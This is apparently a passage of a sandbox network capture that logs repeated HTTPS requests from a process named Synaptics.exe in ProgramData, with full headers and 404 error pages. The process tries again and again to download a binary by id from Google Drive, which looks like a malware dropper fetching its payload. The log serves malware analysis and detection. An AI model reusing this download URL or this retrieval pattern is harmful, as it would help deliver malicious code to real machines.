                                                                                                                                                                            120 | 192.168.2.8 | 49895 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-12-30 10:49:45 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:45 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:45 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-OWPAH6Zj6kTV9svfr5sbvw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            121 | 192.168.2.8 | 49897 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-12-30 10:49:45 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:45 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:45 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-AuRW0NHu3nsXjc4IfV14vA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            122 | 192.168.2.8 | 49894 | 142.250.185.161 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-12-30 10:49:45 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:45 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC5EBG23dgdmR367lMpCot7qExIGoyc8cgx9D8ENHpF9dUmiTdf1cK7-XEuC7Nqpputp
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:45 GMT
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-bkiRd-8iw6BvN8uw5T2ebg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
2024-12-30 10:49:45 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:49:45 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="QpgvkVf3zFb0LNyynhX8mA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:49:45 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
123 | 192.168.2.8 | 49896 | 142.250.185.161 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:45 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:45 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC7Mdk3JnpnMJ-sq7WyUAvEmOw6i-hDql2XfBN1krJKJX8dnPjuSASnXkis0zEsE9tr7
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:45 GMT
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-pOTNL-hQHg-bAvYH2UaBkg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
2024-12-30 10:49:45 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:49:45 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="VTMuFyCIyxdOrgwh8HsObw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:49:45 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
124 | 192.168.2.8 | 49899 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:46 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:46 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:46 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-E3-Z-rLjIpfmyKkaFtTvnA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
125 | 192.168.2.8 | 49901 | 142.250.185.161 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:46 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:46 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC5-GJyMa3vimJ8-b3VX4FV45gQPdOyrdHt9hZoihy7d7AmNkdjiq9Iee3Z_DHJTA2OYr_fm-eA
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:46 GMT
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-g3TMxp-Uidph3MTS-EuwIg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
2024-12-30 10:49:46 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:49:46 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="M51TBTqvgvKlzlctfehFqg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:49:46 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
126 | 192.168.2.8 | 49900 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:46 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:46 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:46 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-b76RwzUTejLQWQhn0bWkEg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
127 | 192.168.2.8 | 49902 | 142.250.185.161 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:46 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:47 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC58NE_J6-gh5CXVU6EQJUBBe_Rv21O0ADXUiVNq_X4SdrMVCUx85NwZBAswMrwewlog
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:46 GMT
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-FamdA6oRxriUznRJjhQRSw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
2024-12-30 10:49:47 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:49:47 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="Iz5fegswW2zvrIZ9ORYmGA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:49:47 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
128 | 192.168.2.8 | 49905 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:47 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
129 | 192.168.2.8 | 49906 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:47 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
130 | 192.168.2.8 | 49907 | 142.250.185.161 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:47 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
131 | 192.168.2.8 | 49908 | 142.250.185.161 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:47 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
132 | 192.168.2.8 | 49910 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:48 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
